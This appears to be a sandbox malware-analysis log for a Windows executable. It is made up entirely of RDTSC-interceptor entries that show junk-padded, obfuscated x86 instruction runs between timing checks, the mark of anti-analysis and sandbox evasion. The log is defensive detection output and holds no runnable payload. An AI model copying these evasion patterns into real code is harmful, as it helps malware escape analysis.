Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0F7A second address: 4DC0F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA4C9026350h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0F92 second address: 4DC0F97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E307C1 second address: 4E307E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E307E6 second address: 4E307EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0B9A second address: 4DC0BA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0BA0 second address: 4DC0BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0BA6 second address: 4DC0BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0BAA second address: 4DC0BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0BAE second address: 4DC0BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FA4C9026354h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov cx, bx 0x00000017 mov si, bx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0BD8 second address: 4DC0C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FA4C908415Ch 0x00000012 jmp 00007FA4C9084162h 0x00000017 popad 0x00000018 jmp 00007FA4C9084162h 0x0000001d popad 0x0000001e push dword ptr [ebp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FA4C908415Ah 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0C35 second address: 4DC0C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0C39 second address: 4DC0C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0C3F second address: 4DC0C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C902634Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0C50 second address: 4DC0C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f mov cl, 45h 0x00000011 mov eax, edx 0x00000013 popad 0x00000014 push dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a call 00007FA4C908415Ch 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0C85 second address: 4DC0C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0C8A second address: 4DC0C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C908415Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30520 second address: 4E30526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30526 second address: 4E3052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E3052C second address: 4E30530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30530 second address: 4E30534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30534 second address: 4E30543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30543 second address: 4E30547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30547 second address: 4E3054D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E3054D second address: 4E30553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30553 second address: 4E30557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30557 second address: 4E305A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA4C908415Ch 0x00000013 sbb esi, 20FE1B38h 0x00000019 jmp 00007FA4C908415Bh 0x0000001e popfd 0x0000001f movzx esi, bx 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA4C908415Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E305A5 second address: 4E305AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E305AB second address: 4E305AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E305AF second address: 4E305DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FA4C9026353h 0x00000014 pop ecx 0x00000015 mov ax, dx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00BD5 second address: 4E00C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA4C908415Eh 0x00000009 adc si, 36B8h 0x0000000e jmp 00007FA4C908415Bh 0x00000013 popfd 0x00000014 mov ax, EEEFh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00C07 second address: 4E00C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00C0B second address: 4E00C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00C22 second address: 4E00CA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA4C902634Fh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FA4C9026359h 0x0000000f sbb ah, 00000066h 0x00000012 jmp 00007FA4C9026351h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushfd 0x00000022 jmp 00007FA4C9026359h 0x00000027 or esi, 13F11D76h 0x0000002d jmp 00007FA4C9026351h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00CA0 second address: 4E00CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C908415Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00CB0 second address: 4E00CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E50539 second address: 4E5053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E5053D second address: 4E50543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E50543 second address: 4E5058F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 6E3B808Dh 0x00000011 pushfd 0x00000012 jmp 00007FA4C908415Ah 0x00000017 sub ax, C8A8h 0x0000001c jmp 00007FA4C908415Bh 0x00000021 popfd 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA4C9084160h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E5058F second address: 4E50595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30DEA second address: 4E30E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA4C9084167h 0x00000009 jmp 00007FA4C9084163h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 jmp 00007FA4C908415Fh 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FA4C908415Bh 0x00000024 adc ecx, 57DFC54Eh 0x0000002a jmp 00007FA4C9084169h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30E5F second address: 4E30E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA4C9026359h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30E87 second address: 4E30E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30E8B second address: 4E30E91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30E91 second address: 4E30EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov al, 4Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DD0255 second address: 4DD029C instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FA4C902634Ah 0x0000000c sub eax, 54D65848h 0x00000012 jmp 00007FA4C902634Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FA4C9026356h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov bx, cx 0x00000026 mov cx, 3D9Fh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DD029C second address: 4DD02BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov eax, 31F56033h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA4C9084160h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DD02BF second address: 4DD02C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30622 second address: 4E30628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30628 second address: 4E30637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C902634Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30637 second address: 4E30689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FA4C908415Eh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FA4C908415Dh 0x0000001e jmp 00007FA4C908415Bh 0x00000023 popfd 0x00000024 mov dh, ch 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30689 second address: 4E3068F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30BD0 second address: 4E30BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30BD4 second address: 4E30BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30BD8 second address: 4E30BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00AF6 second address: 4E00B5C instructions: 0x00000000 rdtsc 0x00000002 mov cx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FA4C9026359h 0x00000010 or eax, 4BEE9116h 0x00000016 jmp 00007FA4C9026351h 0x0000001b popfd 0x0000001c call 00007FA4C9026350h 0x00000021 pop edx 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 mov ch, 41h 0x00000028 mov ch, bl 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FA4C902634Dh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00B5C second address: 4E00B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00B62 second address: 4E00B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00B66 second address: 4E00B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30F0B second address: 4E30F31 instructions: 0x00000000 rdtsc 0x00000002 mov bh, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA4C9026359h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30F31 second address: 4E30F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30F36 second address: 4E30F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30F3C second address: 4E30F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FA4C9084160h 0x00000010 or ecx, 6525E8D8h 0x00000016 jmp 00007FA4C908415Bh 0x0000001b popfd 0x0000001c popad 0x0000001d movzx ecx, bx 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA4C908415Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DE0A6A second address: 4DE0A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40BB9 second address: 4E40BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40BBD second address: 4E40BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40BC1 second address: 4E40BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40BC7 second address: 4E40BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40BCD second address: 4E40BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40BD1 second address: 4E40C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA4C9026350h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov cl, 50h 0x00000017 pushfd 0x00000018 jmp 00007FA4C9026359h 0x0000001d adc ax, 6BE6h 0x00000022 jmp 00007FA4C9026351h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40C2C second address: 4E40C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40C32 second address: 4E40C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026353h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cl, F9h 0x0000000f pushfd 0x00000010 jmp 00007FA4C9026351h 0x00000015 xor cx, 6EA6h 0x0000001a jmp 00007FA4C9026351h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40C81 second address: 4E40C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40C85 second address: 4E40C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40C8B second address: 4E40D40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007FA4C908415Ch 0x00000011 pop ecx 0x00000012 mov eax, edi 0x00000014 popad 0x00000015 mov al, bh 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FA4C908415Fh 0x00000020 and ax, BBEEh 0x00000025 jmp 00007FA4C9084169h 0x0000002a popfd 0x0000002b mov ebx, esi 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FA4C908415Fh 0x00000038 xor al, FFFFFFFEh 0x0000003b jmp 00007FA4C9084169h 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007FA4C9084160h 0x00000047 sbb ecx, 1F9128F8h 0x0000004d jmp 00007FA4C908415Bh 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40D40 second address: 4E40D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9026354h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40D58 second address: 4E40D85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [775165FCh] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA4C9084165h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40D85 second address: 4E40DB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FA4C9026356h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40DB6 second address: 4E40DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA53B6D6CF7h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
